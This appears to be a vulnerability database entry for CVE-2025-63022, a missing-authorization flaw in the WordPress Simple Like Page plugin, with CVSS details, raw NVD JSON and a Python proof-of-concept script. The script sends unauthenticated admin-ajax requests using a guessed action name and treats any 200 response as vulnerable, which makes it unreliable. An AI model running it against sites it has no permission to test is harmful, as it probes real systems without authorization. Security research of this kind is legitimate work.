Security Vulnerability Report
中文
CVE-2025-63022 CVSS 5.3 MEDIUM

CVE-2025-63022

Published: 2025-12-31 15:15:54
Last Modified: 2026-04-23 15:34:58

Description

Missing Authorization vulnerability in topdevs.net Simple Like Page simple-facebook-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Like Page: from n/a through <= 1.5.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple Like Page Plugin <= 1.5.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63022 PoC - Simple Like Page Broken Access Control # Target: WordPress site with Simple Like Page plugin <= 1.5.3 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-63022 """ # Common admin-ajax.php endpoint for WordPress AJAX actions admin_ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Try to access plugin's sensitive function without authentication # The plugin should check current_user_can() before processing payload = { 'action': 'slp_like_action', # Example action name, adjust based on actual endpoint 'post_id': 1, 'like_status': 'like' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': target_url } print(f"[*] Testing target: {target_url}") print(f"[*] Sending unauthorized request to: {admin_ajax_url}") try: response = requests.post(admin_ajax_url, data=payload, headers=headers, timeout=10) # Check for successful response without proper authentication if response.status_code == 200: print("[!] Potential vulnerability detected!") print(f"[!] Response status: {response.status_code}") print(f"[!] Response preview: {response.text[:200]}...") return True else: print(f"[*] Response status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-63022_poc.py <target_url>") print("Example: python cve-2025-63022_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63022", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:54.160", "lastModified": "2026-04-23T15:34:58.333", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in topdevs.net Simple Like Page simple-facebook-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Like Page: from n/a through <= 1.5.3."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Illia Simple Like Page permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Simple Like Page: desde n/a hasta 1.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-facebook-plugin/vulnerability/wordpress-simple-like-page-plugin-1-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}